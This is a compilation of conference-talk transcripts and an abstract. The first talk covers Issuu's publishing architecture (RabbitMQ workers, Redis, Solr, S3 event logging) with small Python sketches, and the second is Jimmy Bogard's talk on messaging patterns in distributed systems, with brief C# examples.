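    def build_stream_page(request, offsets):
        # Placeholder: query the content sources (Solr, MySQL, trending, ...)
        # and merge them according to the stream definition tree.
        return [], offsets

    channel.basic_consume(queue="stream_requests", on_message_callback=on_request)
    channel.start_consuming()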
And the next time I send, well, please give me the next documents in my stream, then I have no guarantee that I'll be connected back to the same workers. We designed the workers to be stateless so that the response you get back from a worker also contains, now we have all these substreams, and then contains sort of a representation of the offset in which are the substreams that I'm in. And then another worker can pick up the continuation request, which has the necessary data to say, well, I'm here, then you can give me, say, 50 more documents. So this stateless worker shared nothing model has been very useful. And the final thing is that to allow workers to share some state or result of some processing so that we don't unnecessarily have to go out and hit all these back-end systems, we try to cache as much as we reasonably can, and we do that by using Redis locally on the machines. Redis is an in-memory key value store, which works very well for this kind of pattern. And finally, I don't know if I mentioned it, the stream servers are simply Python processes, so it's just Python glue to orchestrate all of this. Yeah? Do you have some kind of sticky, especially thing that you think of? No. Every day, one of the Redis servers, they share them through stream servers. No. So actually, if I do one request and I end up on one host and then I do another request and I end up on another host, if that is not cached, whatever is necessary on that host, then I might have to do the work twice or up to four times since I have four servers. So that's just... No, but then I might look at, Redis has a replication capability, so I might use Redis' replication capability to avoid this kind of thing. I might set up a completely external pool of memory caches. There are several ways of working on this. That would also... But sticky session... So it's slightly sticky, so that you prefer this one, right? Yes. But that might give other issues with respect to load balancing and sticky sessions is an HTTP concept and since we're transforming HTTP requests into messages on a message bus, it doesn't really fit into a stickiness architecture. So there are probably several ways of handling this, but it hasn't proven to be necessary yet. Another thing... I only have 10 minutes left, so I'm going to speed up a bit. Another thing which this model gives us is automatic failover. There are no available workers to handle your request in a short time, say 400 milliseconds. Then NQP supports a concept which is called dead lettering. Dead lettering basically means that if I've been waiting in line and I can't be served quickly enough, then the NQP infrastructure will automatically move my message over to another queue where we have another pool of workers sitting waiting and they will be able to give you a response which isn't as good as the response over here, but it's sort of a canned response which is better than nothing. So then I can give a guarantee about within a relatively short period of time, I will be able to give my consumers a response which will either be good if all this over here is happy or it'll be slightly less good but at least won't be an error. Right. I will talk a bit about search now. So part of the fulfilling the category part of the stream and also the stuff which is related to documents that I read recently by looking at the segments is handled by a search engine. And actually it turned out that we had several kinds of searches that we wanted to do. 
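Before moving on with search, here is roughly what the dead-lettering fallback described above can look like when the broker is RabbitMQ; the queue names and the 400 millisecond budget are illustrative:

    # Requests that wait too long in the primary work queue are moved by the broker
    # to a fallback queue, whose workers return a canned "good enough" response.
    import pika

    channel = pika.BlockingConnection(pika.ConnectionParameters("localhost")).channel()

    channel.exchange_declare(exchange="stream_fallback", exchange_type="fanout")
    channel.queue_declare(queue="stream_requests_fallback", durable=True)
    channel.queue_bind(queue="stream_requests_fallback", exchange="stream_fallback")

    channel.queue_declare(
        queue="stream_requests",
        durable=True,
        arguments={
            "x-message-ttl": 400,                         # max time in queue, in ms
            "x-dead-letter-exchange": "stream_fallback",  # where expired requests go
        },
    )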
In some cases we only search on document metadata such as the document segment, the language that it's written in maybe by publisher, a whole range of field that we might be able to think of that we are sort of the only metadata related to the document. Sometimes you want to search the full text to find out if I search for fashion would that be relevant within the document. Maybe I want to search within a document or I can search publishers and we also have a concept called stacks which is a way for which allows an individual user to collect documents into groups which are meaningful for that user. We have in our search indexes we have around 9 million documents because not all of the documents that are on issue are available for public consumption we call these. The ones which don't go into search are unlisted so you can't find them in the search engine. We have around 250 million pages indexed, one million publishers and around 700,000 stacks right now. We ended up using solar. It's an open source search engine and infrastructure surrounding search. A good pattern for us was to fit stuff in memory that could be in memory. So the metadata index we only have 12 million documents that will actually fit comfortably in memory on a large memory machine. Text search that index is pretty large so to do that we needed many searches. It's a disk intensive operation to traverse an index so we use SSDs, back disks to get maximum performance out of that. Solar is actually very fast infrastructure, it's very good at indexing, it has some pretty impressive numbers. So basically the Mesa data index we can re-index in a matter of hours, the document index we can re-index in say 8 hours and per page index which is the biggest one, takes slightly over a day. We're using solar 4042 and we're trying to keep up there, lots of releases of solar. So the interesting part with solar, again we see the same multi-availability zone thing that we've seen throughout. A proxy in front, solar has an HTTP interface so the stream service will connect to solar through HTTP. We can put these in several zones, we have these various indexes running on different hosts. So that part is fairly run of the mill. What's more interesting is how we actually keep the solar indexes updated and that's real work in my mind with how to use solar is how do you actually feed the content into solar, how do you mesh it into your infrastructure and pick up relevant bits whenever necessary, when a document is uploaded, when a document is deleted, when a user decides to change stuff. And that is done simply by having a generator process which sits and listens on MQP and we have documents which manipulate, processes which manipulate documents on issue when these events happen, we'll put messages onto the message infrastructure saying, ooh, a document was uploaded or a document submitted as it was changed, this generator can then listen to the stuff changed events, go out and query all the relevant external sources, gather together the content about this document and then put it as a message onto this bus and these guys up here that are interested in that can then subscribe to messages down here and say, oh, now I need to update myself, update the solar index with this relevant content and these update are all written in Python as well. There's no real need for any high efficiency here, it's more a matter of basically processing JSON messages and sticking them into the index, yes? 
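A sketch of that updater pattern: consume "document changed" messages from the bus and push the gathered metadata into Solr over its JSON update handler. The core name, queue name and message layout are made up for the example:

    import json
    import pika
    import requests

    SOLR_UPDATE_URL = "http://localhost:8983/solr/documents/update?commit=true"

    def on_document_changed(ch, method, properties, body):
        # e.g. {"id": "...", "title": "...", "language": "en", "segment": 1234}
        doc = json.loads(body)
        requests.post(SOLR_UPDATE_URL, json=[doc])
        ch.basic_ack(delivery_tag=method.delivery_tag)

    channel = pika.BlockingConnection(pika.ConnectionParameters("localhost")).channel()
    channel.queue_declare(queue="solr_metadata_updates", durable=True)
    channel.basic_consume(queue="solr_metadata_updates",
                          on_message_callback=on_document_changed)
    channel.start_consuming()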
So, every once in a while we can see that the solar index gets out of sync with the authoritative storage, whatever it is and then we can re-index and we designed for automatic re-index, basically it goes to push of a button and we can spawn off a new instance with an authoritatively correct index and an advantage of using the message infrastructure is that you, if you have a queue of stuff that, say, this instance here is responsible for getting into the index, if this guy crashes, when he comes back up, he will have queued up messages of stuff that he has to do, documents that have been deleted or documents that have been added whenever, since he went down. So, when he comes back up, he will read off all the messages of stuff that has to be done and he will get in sync. So it's a fairly robust architecture for that. You said that you have an authoritative index, do you actually just cook it out in the files that are for you? No, no, so when I say the authoritative index, it has many different sources. So my sequel, for example, is the authoritative storage place for anything to do with documents and users. We also use popularity measures which come from other parts of the system for ranking within the searches. So they are authoritative for that. Whenever we just, we have to query many different sources for what is authoritative for this view on this document. How do you prepare for horizontal scaling with solar? So solar for series comes with a concept called solar cloud, which basically is a pool of service and it does all kinds of sharding. It uses an Apache project called ZooKeeper to handle distribution of, it's masterless, so it has many, many clients and sharding and validator. And what we learned was that this doesn't work. It's simply not mature enough. So we basically just do simple servers and the message bus infrastructure just handles the load balancing for us. We have, once from an individual service view, it's just a single solar index with just a single solar server. It knows nothing about any of the other servers. And all the load balancing and distribution of work is all handled through the message bus infrastructure. Okay, I only have three more minutes, so I want to get on to talking about how we handle consumption tracking. Whenever you are moving around on issue, we collect all kinds of stats about you because that's important for us to know how you as a user act. And basically we are generating what we call pingbacks. And then capture the message sent from the client back to a server at issue, which contains events that you've performed. Like I have read a document, I have seen this document displayed and impression of a document, I have flipped the page, I have spent an increment of time on the page so we can track how much time is spent on given pages and documents. And the model that we've used to handle this is, there's quite a lot of traffic here on average 10,000 events per second. Because the client generates a pingback, which is an encapsulation of one or more events. Again, it goes to a proxy, which can distribute out to one or more loggers. And loggers are basically just Python processes which will build up chunks which contain sets of pingbacks. Now, a pingback is just a JSON structure. So a chunk is a new line separated batch of JSON structures. These are all stored in S3 that allows us to sort of separate out on a large number of workers an aggregation into larger units. And that stores comfortably in S3, scales pretty well. 
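A sketch of the logger side of that pipeline: buffer incoming pingback events and park them in S3 as newline-separated JSON chunks for the serializer and aggregators downstream. The bucket name and chunk size are illustrative, not Issuu's actual configuration:

    import json
    import time
    import uuid
    import boto3

    s3 = boto3.client("s3")
    CHUNK_SIZE = 10_000
    _buffer = []

    def log_pingback(event):
        # event is a dict such as {"type": "impression", "doc": "...", "ts": ...}
        _buffer.append(json.dumps(event))
        if len(_buffer) >= CHUNK_SIZE:
            flush_chunk()

    def flush_chunk():
        global _buffer
        if not _buffer:
            return
        chunk = "\n".join(_buffer) + "\n"   # newline-separated JSON events
        key = f"pingbacks/incoming/{int(time.time())}-{uuid.uuid4().hex}.chunk"
        s3.put_object(Bucket="example-pingback-chunks", Key=key,
                      Body=chunk.encode("utf-8"))
        _buffer = []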
And then we then have, we like to be able to express that we have now authoritatively received the chunk. We want to give it a unique serial number so that we know how many chunks we've had. And we also want to time stamp it so that we can agree on what time we've received all the messages in there. And then that's a process, a single point of failure, a single process that will lift chunks out of there, move it into here, give it a monotonically increasing serial number. And then once it's moved over here to the sort of the authoritative storage, it'll send out a message on NKP saying, now I have a new chunk available. And then we have aggregated processes which can lift out chunks and collect various stats, say how many reads and do something about it. And it'll store it in a, in a queryable data store of various kinds depending on what kind of stats we need. This has proven to be a very flexible model. It scales very well, but it does have some problems, which is that once we have received the data, it's not immediately queryable. And we would like to have, to implement some way which would be more immediately queryable, more directly queryable. So we're looking at refining the way that we've done this into something a bit more lightweight. Right, so. We are actually experimenting with Hadoop to, to processes. We're trying to set up a Hadoop cluster to see how much throughput can we get with Hadoop to, to processes. But even writing stuff in Hadoop or pig is not really ad hoc. At least not, not enough for, for the data business analysts guys that want to do it. So. Have you looked at stats, the Etsy stuff? No. But I'd like to hear about that if you just give me a pointer afterwards. I'll just try to wrap up here now. So when you do stuff at web scale and you pick up the tools from the web that are supposed to be able to handle all this kind of stuff, it often doesn't work, at least in our experience. And you really have to know what you're doing with it. It doesn't, there's no, no silver bullet. There's no magic. You really have to understand what you're doing in order to make it, make it scale at high volumes. We've experimented, for example, with Elasticsearch and with Couch2B. Didn't work for us to be fair. Elasticsearch was, this was one and a half years ago when we tried it. It was still very immature. It might be much better now. We're gonna...
|
Issuu provides a distribution platform for print publications and viewers for a range of devices. Much like on YouTube, users can upload content and share links to a viewer that displays the content. Issuu has more than 11,500,000 publications, serves over four billion pages a month to 70 million unique monthly visitors, making Issuu one of the 600 most visited sites in the world. On average, 25,000 new publications are added daily, and they are automatically categorized and fully searchable. The 7 million registered users can upload publications and create collections of their favorite publications found on Issuu and share them with other users. This talk will provide a high-level overview of the Issuu architecture by tracing the lifecycle of a publication. How does the upload process work, how does automatic categorization work, how does a publication become searchable, what happens in publication discovery and consumption, etc. Keywords: Scalable architectures, functional programming, statistical analyses, programming in the large, cloud computing, Amazon EC2, message bus (amqp/rabbitmq).
|
10.5446/51440 (DOI)
|
All right, thank you everyone for coming. My name is Jimmy Bogard. Today we're going to be talking about, well, if you couldn't guess from the title, we're going to be talking about messaging and distributed systems. It's a little bit of a play on words, because a lot of what I'm going to be talking about today is looking at how the constraints and problems of the real world, and how people solve them in the real world, can be applied to systems that we build. You can find me on Twitter at @jbogard, and I also blog at the link below there. Everything that we talk about today will be on my GitHub, which is also just github.com/jbogard. I try to keep it simple because I can't remember too many things at once, so try to just keep it one at a time. This talk actually has no code in it whatsoever. If you want to see some code, now's your chance to go somewhere else, because we're not going to be actually seeing any code today. The reason why is that in a lot of the systems that I see worked on, especially distributed systems, people like to dive into the code and the technology really quickly. With something like distributed systems, it's really, really important to think about how these pieces are put together before we start talking about any sort of code. That's one of the reasons why I didn't want to show any code: I really want to talk about the different patterns that we put in place to be able to build distributed systems, without showing the code. The other reason is I didn't really want to show a specific technology, because all the patterns we're looking at can be applied to any messaging technology, whether it's human messaging of telephones and postcards and email and things like that, or actual technology we probably work on, things like MSMQ, Azure Service Bus, RabbitMQ, ZeroMQ. The patterns we'll apply, apply to all of those, not just any individual one. Like I said, I meet with a lot of teams that build distributed systems. The reason why I'm usually meeting with them is they either don't know what they're doing and haven't built anything yet, or they built something and it was a complete disaster. I wanted to share a couple of stories of some of those disasters, just to highlight why they were thinking the wrong sorts of things when they were building their system, and how, if they had thought about things in terms of how it would work in the physical world, they could have built a much better system. One team I consulted for is a Fortune 50 e-commerce company. They have 75% of their business through their website, billions of dollars a year. They wanted to upgrade their website, and not just their website, but all their back-end systems as well. Just like a lot of systems that you've probably worked on, they start small and they grow over time, and it usually just becomes this one big ball of mud where all of the systems work against a single application. This company in particular started in the 80s, so it was built on a mainframe, and the mainframe was built up as high as it could go and wouldn't go any further. They said, okay, obviously the mainframe isn't going to scale any more than it is now. We've got all these different other things going on, the website's a mess, everything's in the code-behind. What we need is service-oriented architecture. So said the consultant that was there six months earlier.
They wanted to do SOA because they were told that by breaking these things up into individual pieces, they would be easier to work on, easier to deploy, easier to reason about, with fewer bugs. Hopefully. That was the grand vision. In applying SOA, they also thought that meant you had to do SOAP everywhere, that SOAP was just the logical extension of SOA. To do SOA, you have to do web services and you have to do SOAP-based messaging. So they took this application, broke it up into all these pieces, and used WCF calls to connect all the pieces. So if I wanted to go look at a product page, I would go to the list of products. Well, if I wanted to get a price on something, they would have to make a call to a price service to go get the price, because pricing is something over here that's being done. To show the content, they have to go to the content service; to know if I'm in a different region, different language, they'd have to call to these other services. So everything was broken up really well, but everything was using WCF as the communication mechanism between these different things. So, you know, they called themselves Agile, but they didn't actually deploy anything for about a year and a half. And this is not an exaggeration: they spent over $100 million on the system before they even tried to go live. So once everyone was done, because they couldn't just roll it out one piece at a time, they said, okay, let's go to our test environment to see how this thing works. It didn't come up; the page timed out, nothing came up. So, okay, well, you know, production will be on production hardware, so let's go to production-like hardware to see how this might run. So they go to the production-like hardware and it still timed out. So they said, okay, huh. So let's jack up all the timeouts on all of the WCF endpoints as high as they'll go, which is an ungodly amount, it's like five minutes, you can make it 30 minutes if you want to, and see if we can just get this page to respond. So a single page, just showing a list of products for a single category: nine and a half minutes to render. Nine and a half minutes. Now, the funny thing is that they actually had a working application in production, and if you looked at the production application, the response time was something like three, four seconds. Not insanely fast, as fast as Amazon can get sometimes, but still. I mean, they went from three to four seconds to nine minutes for the low, low price of over $100 million. Just absolutely insane. But when we talked to them, we said: it's good that you wanted to break things out into services, but the way you decided to integrate them would not work in the real world. And so one of the things we'll be looking at over the course of today's talk is how those decisions, when we have different processes, about how they communicate, have a real effect on how these systems can perform. And the same constraints we find in the real world will also apply to the systems we build. And about all the constraints in their system, they said, oh, yeah, of course the product catalog can call the price service. Well, that's 100 milliseconds. You know, we've fulfilled our SLA. But then they have a list of products, so they were calling it for each one.
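(Editorial aside, not the company's actual code: the shape of the problem just described, one blocking remote call per product, sketched in C# with made-up types.)

    using System.Collections.Generic;
    using System.Linq;

    class Product { public int Id; public decimal Price; }

    interface IPricingClient
    {
        decimal GetPrice(int productId);                            // one remote call per item
        Dictionary<int, decimal> GetPrices(IReadOnlyList<int> ids); // one batched call
    }

    static class ProductPageLoader
    {
        // The anti-pattern from the story: N blocking remote calls for N products.
        // At ~100 ms each, fifty products means ~5 seconds spent on pricing alone.
        public static void LoadPricesOneByOne(List<Product> products, IPricingClient pricing)
        {
            foreach (var p in products)
                p.Price = pricing.GetPrice(p.Id);
        }

        // One round trip instead of N; locally replicated price data is better still.
        public static void LoadPricesBatched(List<Product> products, IPricingClient pricing)
        {
            var prices = pricing.GetPrices(products.Select(p => p.Id).ToList());
            foreach (var p in products)
                p.Price = prices[p.Id];
        }
    }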
So just to see the sort of network graph, by the way, trying to get a stack trace of that is impossible when you have, you know, 18,000 servers running this thing and you try to figure out how a request actually goes through. There's a circle of hell for people that had to figure that out that's just absolutely amazing. So one of the things that we talked to them about, and this is sort of a disclaimer here (oops, there we go, PowerPoint 2013, no idea), is that nothing you see here will be new to you. All the patterns we talk about, you've already seen in real life. What you probably haven't done is taken those ideas and applied them to the systems you're building. Because as soon as we go from a single in-process, one-process system to one that has more than one process, we have to think about how those things interact. So what we'll be going over today is looking at how, in the real world, people actually scale up real-world systems that don't involve computers, and how those same solutions can solve our problems in messaging between our systems. Now, just to take one step back, when I talk about messaging, I'm not necessarily talking about MSMQ or RabbitMQ. I'm more talking about just the general term of when things need to exchange information, because a message is just data, and messaging just involves the transfer of data from one entity to another; that's really all messaging is about. So everything we see here can apply, and will apply, to things like REST, to things like RabbitMQ, to both durable and non-durable messaging, all sorts of styles of messaging that we'll be talking about, all of which have a place in the systems that we build. So let's look at different styles of messaging before we see how we can apply them. There's a few different flavors of the kinds of messaging that we'll be looking at. First, starting out, we'll look at synchronous versus asynchronous messaging. Synchronous messaging is when the first person makes a call, sends a message to the second person, and they block. So I don't do anything else until I receive a reply, and the other side can't do anything else until they've responded back to me. So typically I think of this in real-world terms as things like phone calls. When you call someone on the phone, you can't do anything else. I hope you're not driving while you're on the phone; well, I don't know if they've passed laws here, but they've started passing laws in the States that you can't talk and drive. They've done it for texting and driving; it's just amazing to me that people can actually do that. I guess they can't. But I think of synchronous messaging as a phone call, because I have two independent people that are doing their own thing, these could be two processes, and in order to make a synchronous call, they'll block on both sides. Now, WCF lets you do things like async. You can decorate your controller action with async and await, and it won't block on the server side for another request to come through, but I'm still blocking on the client side. So if I make a request, I'm waiting for a response, and I'm not doing anything else until I receive that reply back. The other side would be the async messaging. So in an asynchronous manner, whenever I send a message out, I'm not waiting for the other side to confirm that they've received and processed the message. Now, I may synchronously wait for my messaging system to confirm they've received the message.
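(A quick, hedged sketch of the distinction just described; the URL and queue here are placeholders, not a real API.)

    using System.Collections.Concurrent;
    using System.Net.Http;

    static class SyncVsAsyncMessaging
    {
        // Synchronous, like a phone call: the caller blocks until the reply arrives.
        public static string AskForPriceSync(HttpClient http)
        {
            // .Result blocks the calling thread until the other side answers.
            return http.GetStringAsync("https://example.test/price/42").Result;
        }

        // Asynchronous, like posting a letter: hand the message to the outbox and move on.
        public static void SendOrderAsync(BlockingCollection<string> outbox, string order)
        {
            outbox.Add(order); // blocks only long enough to drop it in the mailbox,
                               // no waiting for the receiver to read or process it
        }
    }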
I imagine this as basically sending a letter. Whenever I go send a letter out, I'm synchronously walking to my mailbox and dropping the letter in. I don't know if people still actually do that these days, but it helps to be able to remember these systems at least. So that is a synchronous operation. I don't fold a paper airplane and just throw it over there, and maybe it makes it into the mailbox, maybe it doesn't; I do block until I actually put the message in the outbox, and then I'm done. But I'm not blocked and waiting for the other person to read my letter. When they read the letter, I have no idea. I don't care. So we use this every day, of course, in email. We send emails out, and we're not waiting for a reply back at that time. If we wanted to have a synchronous communication, we should have just called them up on the phone or gone and physically talked to them face to face. So things like email and postcards are all about an asynchronous means of communication; that is, neither the sender nor the receiver is blocking while the message is traveling back and forth. The next flavor we have is looking at durable and non-durable messages. Durable messages are messages that are stored somewhere. They're not just something that is transmitted during the messaging and then goes away. They live somewhere. So I tend to think of durable messaging as things like email and postcards. They're physical items, so if something goes wrong, I still have that physical item to go back to. If it gets misdelivered, I can still go deliver it back to the right person. Non-durable messages, as the name says, are the opposite, in which there is no sort of backing store for these things. They're just transmitted, and in the act of transmission, they live for that amount of time, and after they're received, they don't live anymore. So for us in the real world, this would be like verbal communication. As soon as my words leave my lips, if you didn't hear it, you don't get the message. What's that? Oh, that's true. You can watch it in the video. Yes, of course. It's going to be that guy, all right? So putting these two together, we can have durable synchronous messaging and durable asynchronous messaging. We can have non-durable synchronous and non-durable asynchronous. So to me, the analog of a phone call is something like a REST call or a WCF call. Both sides are blocking, and it's non-durable if you just use the default WCF, whatever. This is the same way HTTP is stateless by nature. So if the other side is down, then I don't get a response back. That's the synchronous part. It doesn't live anywhere either, so that's why people invent things like session state, because ultimately, requests are non-durable, and if I want to keep something around for longer than that request, I have to do something extra. So the first thing I do, as I'm building systems that are using those technologies, is imagine my processes communicating with each other by those means. So even when I'm drawing, I'm like, okay, so this original e-commerce system, the system they built was one in which the user first came to the website, and that's a synchronous operation, right? I'm sitting at my computer waiting for the screen to come up to do something. So that's equivalent for me to come up and call the person on the phone. I want to order something.
Okay, so that person, the web server, received the request, and now they make 10,000 other calls to other people to then get the results of that request. So they call this person on the phone, they call that person on the phone, this person over here calls this other person. This is the picture I painted for them about the architecture they chose. I said, okay, these all have a response time, yes, of 100 milliseconds, but you add all these together, and you've got a system that can't do anything. And even if they said, well, we'll just optimize, we'll just say latency goes down to one millisecond, that's not really the point. The point is that I'm blocking all those requests because I have to make those calls to all those different people. And just slapping async on, which by the way, they did try as well, they tried just slapping async on all their web services, basically gave them an internal distributed denial-of-service attack, because this one would not block and wait for that one, it would call on to this one; now that one would not block and wait for a call to another one; and so they would just have these deadlocks between web services because everything was trying to talk to each other. It would be funny if not for the $100 million they spent on this system. Okay, so I've got durable and non-durable, and asynchronous and synchronous. And the picture I have in my head is telephones and postcards. That's the means of communication here. Okay, so now that I have a basic means to have these messages, I want to look at a few patterns that we can apply on top of these messages. Because our transport technology doesn't really care what the message is about. We have to put patterns on top of the messages to have meaningful interactions between things. So let's look at a few patterns here. The first ones I have are one-way and request reply. A one-way message is one in which I don't expect a response back. Now again, these can be applied to any of the other flavors of messaging, whether it's durable, non-durable, synchronous, asynchronous. So as we're looking at these, we can mix and match these different patterns together. One-way means I don't expect a response back. And we see this every day. Someone sends us an email to do whatever, or my wife tells me I need to mow the lawn. These are one-way messages in which they're not expecting any sort of reply. It could be durable, in that I send an email to someone to ask them to do something, or it could be non-durable, in that someone just tells me to do something. Request reply is a little bit different, in that there's a request to do something and an expected response back. And those two things are correlated together. The reply doesn't exist without that original request. Just like in your email, you can't hit reply unless you're actually looking at an email. In our messaging systems, replies are always then forwarded back to whoever originally sent the first message. Request reply is nice in that the person handling the message doesn't need to know about the originator beforehand. That is, if you published out your Twitter handle, I don't have to know about all of you before you can tweet at me. Once you tweet at me, I can see who you are, and then I can just reply back. But I don't have to have some giant phone book directory that knows every single person before we can have a communication. I just give you my initial address to contact me, and then we can initiate this request-response interaction.
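(A small sketch of those two message shapes, with invented names; the reply carries the request's correlation id so it can find its way back to the original sender.)

    using System;

    // One-way: the sender expects no reply ("mow the lawn").
    record MowTheLawn(string Requestor);

    // Request/reply: the reply only makes sense in the context of the original request,
    // so the request carries a correlation id and a return address.
    record PriceRequest(Guid CorrelationId, string ReplyTo, int ProductId);
    record PriceReply(Guid CorrelationId, decimal Price);

    static class PriceHandler
    {
        // The handler learns who to answer from the message itself, no global directory needed.
        public static PriceReply Handle(PriceRequest request) =>
            new PriceReply(request.CorrelationId, 1.49m);
    }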
A little bit more advanced one is PubSub. In the publish-subscribe model, instead of having just one person I'm replying back to, effectively I can broadcast out to a number of people that might be interested in this message. So we do this all the time. I subscribe to people's tweets, and so when you tweet out, I get that tweet. I don't know anyone else in the room, but you would all get the tweets equally there. So this is something, of course, that the real world has had for a very long time. Magazine subscriptions have been around for a long time; it started out with almanacs. This is just something that has been around for a very long time. And the mechanism is always the same: someone that's interested in subscribing would first let the publisher know, and let them know by saying, okay, here's where I want you to deliver your message. So when you subscribe to a magazine or email newsletter, you have to tell them your email or mailing address in order for them to get back to you. And when the publisher then publishes a message, they just go through the list of all the subscribers and, one by one, go ahead and send those things out. One of the things we have with PubSub is that each individual subscriber gets their own copy of the message. So this ensures that if someone's on vacation, it doesn't affect the delivery of magazines to anyone else. Or if one process is down, just that one process misses the message, but all the other processes are ignorant of that one going down. The other advantage to PubSub as well is that the publisher does not have to know about the subscribers beforehand. The publisher is notified and told, okay, I want to subscribe and here's my address. But again, there doesn't need to be a global directory of everyone in the world before we can have this sort of publish-subscribe pattern here. All right, so next we have different types of interactions within those types of messages. The basic building blocks are going to be one-way messages; two-way, which is request reply; and PubSub. With those three building blocks, we can start building actual systems. The next kinds of messages we have are commands and events. Typically, when people are looking at when something should be one-way and when something should be PubSub, what we'll see is that it basically drops into these two categories. Commands over here, where she's making a rather inappropriate request to tell him to do something at the Christmas party. And events, when something has happened, a notification out. So what I typically see is that request reply and one-way are typically commands; not always, but almost always. And events are typically PubSub. Or that is, when you're doing PubSub, you're typically broadcasting an event, because it's the publisher that has learned that something has happened, and so they're letting other people know. So it's typically something that's happened in the past and is an event. Any questions so far on the building blocks of messaging before we look at actually building a system on top of these? Again, this shouldn't be anything new. I mean, everyone's kind of seen this in real life. What we're going to see next, though, is how to take these building blocks and apply them to a real system, to see how we can scale up based on the constraints that we'll find there. So, messaging in real life.
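(An in-process sketch of the subscribe-then-publish mechanics described above; a real broker would give each subscriber its own queue, here delegates stand in for delivery addresses.)

    using System;
    using System.Collections.Generic;

    record OrderShipped(string OrderNumber);

    class Publisher
    {
        // Subscribers hand over a delivery address up front, like a magazine subscription.
        private readonly List<Action<OrderShipped>> _subscribers = new();

        public void Subscribe(Action<OrderShipped> deliverTo) => _subscribers.Add(deliverTo);

        public void Publish(OrderShipped @event)
        {
            // The publisher just walks the subscriber list; each one gets the event
            // delivered to the address it registered.
            foreach (var deliver in _subscribers)
                deliver(@event);
        }
    }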
A lot of times when I'm talking with customers about how they want to build and architect their distributed systems, I have them actually think about their systems in terms of: what would this system look like if it was built 50 years ago? Because the same constraints we see today in our systems are the same constraints people have run into in regular applications or regular businesses from years ago. So, things like restaurants. I have McDonald's there. It started out as one restaurant and scaled up to be thousands of restaurants nationwide. I've got the Sears catalog, which originally started out as just one trading post store and grew to be a mail-order catalog, and now it's a department store. The last one down there I have is a food truck. These are really popular in the United States as a hipster sort of food. They'll have clever names for these things and they'll drive around to different companies on different days and you can order food out of these things. Allegedly the health inspectors do inspect these things, but I'm not so sure about that. So those things, the catalogs, the restaurants, those are all businesses that drive commerce. On the right side I have Amazon and Zappos, which sells shoes. These are also things that have to do the same kinds of activities that a department store or restaurant has to do, which is: provide a menu of items to select from, have some means of actually transacting business, so they actually have to transact money, and then they actually have to fulfill it on the back end. The exact same sorts of things that e-commerce systems have to do are exactly what's already been figured out in the real world. And this is where people start to go off track. They don't look at their systems in terms of what their real-world counterparts look like, to understand how to solve those same sorts of problems, because again, the constraints of the systems we build in the distributed world are the same constraints we run into in the real world. It's just that the times have gotten a lot shorter. So whereas latency in the real world is in terms of seconds or days or weeks or months, in the virtual world it's much shorter, but it's not zero. The latency is never going to be down to zero. Until we figure out the whole quantum mechanics stuff, we're not going to have zero latency here. So let's look at a very basic application, and this application is going to be our food truck. So I'm just going to have a picture of our food truck, and what we're going to try to do is scale this system up into one that can handle lots more customers and have lots more food trucks. And the same things we use to solve this problem we can also apply to the applications we build. So in this system, this is a one-man show. I've got this one guy inside the food truck and he does everything. He takes your money, he decides what food he's going to sell. He might have... I didn't paint the thing. But he does all the steps. So he packages things up, he puts the ingredients on them, he grills them and he delivers them. He does all of those steps. So what this means is that, with that one process doing everything, it's very similar to this sort of picture. The traditional n-tier architecture is a single process where that one thread of execution, that is that one request, hits all these different layers, doing all these different things, and coming back with the result. Now of course the database is a different process, and some of these things may also be different processes.
But again, it's synchronous; I'm waiting for everything to be done before I come back and am able to actually help the user out. What I want to do is scale this up. And in my food truck I want to look at some basic properties here, just to see where my bottlenecks are and how I can scale this up. So I've got these four steps. I've got taking the order, which is 30 seconds; I've got dressing, which is only 10 seconds. Grilling does take a little bit of time because it actually has to cook, and 100 seconds is pretty generous for grilling anything; it's just like little pieces of meat or something, I don't know. And packing and delivering is about 10 seconds. So the total time for an order is 2.5 minutes, 150 seconds. So if I'm the owner of this business, I can very easily figure out the maximum revenue I can make with this model. And I can see that the revenue is strictly based on how many orders I can process. So if I'm the owner of this business, the name of the game for making more money is to optimize throughput. If I can get more orders in, not just get more orders in but have more people come in and place orders, then I can make more money. And a lot of e-commerce systems I've worked on optimize in exactly the same fashion. They track fallout rates. They track to see how many people got in line but then left. That's really important, right? Because that's lost revenue. How many people walked by and saw the line was long and left? Basically, it's taking too long to process orders. So if I want to scale this up, I have to figure out which way to go here. Some of the other complications I have here: people don't like to wait. So if someone comes in and sees a long line, they're just going to walk away. So if I have a web page that takes a long time to load, I'm going to walk away from that as well. In fact, I saw there was a study done on e-commerce websites to see how long someone would wait before abandoning that site for a similar site, based on how long it would load. It was surprisingly low. It was something on the order of four seconds before they thought something was wrong. Four seconds doesn't sound like a lot of time, unless you're waiting on a website for four seconds. With internet speeds the way they are now, well, maybe not here, but the way they are now, you expect very low latency. I've run some tests on Amazon. If you run Amazon's website through a web page performance tester, it tells you exactly how long it takes to load. A typical Amazon page loads in about two seconds, and that's regardless of the page you're looking at. Absolutely insane. And if you're looking at how long it takes for the DOM to get loaded, that's even shorter. That's something like 800 milliseconds. And how long does it take for the stuff above the fold, that is, the things you see before you have to scroll? It's nearly instantaneous. You can't even perceive it, it's so quick. It's hard to measure, but if you go to Amazon and just check, it comes up almost instantaneously. So they've obviously optimized for that sort of thing, because they've said something like every 100 milliseconds of latency costs them 10%. They have these measurements to figure that out. So they optimized that, because they knew that a long line equals a customer walking away. And I don't want anyone to walk away. The other problem we'll have is this: we said we can handle 24 orders per hour.
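(The arithmetic behind those numbers, spelled out as a tiny snippet; the per-step timings are the ones from the example.)

    // Single worker doing every step in sequence, per order:
    const int TakeOrder = 30, Dress = 10, Grill = 100, PackAndDeliver = 10;  // seconds
    const int SecondsPerOrder = TakeOrder + Dress + Grill + PackAndDeliver;  // 150 s = 2.5 minutes
    const int MaxOrdersPerHour = 3600 / SecondsPerOrder;                     // 24 orders per hour, best case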
